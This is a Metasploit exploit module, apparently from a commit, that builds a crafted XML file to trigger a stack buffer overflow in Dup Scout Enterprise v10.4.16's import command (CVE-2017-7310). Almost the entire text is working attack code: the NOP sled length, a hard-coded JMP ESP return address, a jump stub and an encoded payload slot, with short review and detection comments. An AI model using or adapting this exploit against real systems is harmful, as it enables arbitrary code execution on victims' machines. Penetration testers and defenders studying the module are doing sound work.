bc18389284
Update the documentation based on analysis of the vulnerability. Slight modifications to the exploit module as well to reduce the size of the generated file and reduce bad characters.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  # NOTE(review): this mixin is included but no SEH helper is called anywhere
  # in this file; control flow is taken via a plain return address
  # (target.ret) instead. It may be unused here -- confirm before removing.
  include Msf::Exploit::Remote::Seh

  # Registers the module metadata and the FILENAME option.
  #
  # This is a file-format module: nothing is sent over the network. The only
  # side effect is the XML file written by #exploit, which an operator then
  # feeds to the vulnerable import command. 'DisablePayloadHandler' is set
  # because there is no session to catch at file-generation time.
  #
  # @param info [Hash] module info supplied by the framework, merged by update_info
  def initialize(info = {})
    module_info = {
      'Name' => 'Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow',
      'Description' => %q(
        This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16
        by using the import command option to import a specially crafted xml file.
      ),
      'License' => MSF_LICENSE,
      'Author' => ['Daniel Teixeira'],
      'References' => [['CVE', '2017-7310']],
      'DefaultOptions' => {
        'EXITFUNC' => 'seh',
        'DisablePayloadHandler' => 'true'
      },
      'Platform' => 'win',
      'Payload' => {
        # 0x27 is the single quote that closes the name='...' attribute the
        # overflow data is placed in (see #exploit), so it must never appear
        # in the encoded payload.
        'BadChars' => "\x27",
        'StackAdjustment' => -3500
      },
      'Targets' => [
        # Address is only meaningful for the QtGui4.dll build shipped with
        # this product version; any other build breaks the module.
        ['Windows Universal', { 'Ret' => 0x651BB77A }] # JMP ESP [QtGui4.dll]
      ],
      'Privileged' => false,
      'DisclosureDate' => 'Mar 29 2017',
      'DefaultTarget' => 0
    }
    super(update_info(info, module_info))

    register_options(
      [
        OptString.new('FILENAME', [true, 'The file name.', 'msf.xml'])
      ]
    )
  end

  # Builds the crafted XML document and writes it to FILENAME.
  #
  # Layout of the 'name' attribute value, in order: a 1560-byte NOP run,
  # the 32-bit little-endian return address, 16 more NOPs, a two-instruction
  # stub that moves execution to ESP+0x14, 14 NOPs, then the encoded payload.
  # Defensive note: the artifact is a small .xml file whose single attribute
  # carries roughly 1.6 KB of NOP-equivalent bytes followed by machine code;
  # that shape is what a file-based detection would key on.
  #
  # @return [void]
  def exploit
    stub_lea_eax = "\x8d\x44\x24\x14" # LEA EAX, [ESP+14h]
    stub_jmp_eax = "\xff\xe0"         # JMP EAX

    parts = [
      "<?xml ?><a name='",
      make_nops(1560),
      [target.ret].pack('V'), # 32-bit little-endian
      make_nops(16),
      stub_lea_eax,
      stub_jmp_eax,
      make_nops(14),
      payload.encoded
    ]
    file_contents = parts.join

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(file_contents)
  end
end